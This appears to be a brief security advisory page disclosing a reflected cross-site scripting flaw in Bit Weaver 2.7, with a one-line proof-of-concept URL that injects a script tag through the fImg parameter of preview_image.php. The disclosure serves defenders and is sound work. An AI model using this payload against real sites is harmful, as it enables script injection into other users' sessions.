Home
Consulting
Advisories
Software
Articles
Contact

Bit Weaver 2.7 Reflected Cross-site Scripting

Legacy Advisories

Description

An XSS vulnerability in Bit Weaver 2.7 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/bitweaver/themes/preview_image.php?fImg=%22%3E%3Cscript%3Ealert(0)%3C/script%3E


Copyright © 2018 AutoSec Tools LLC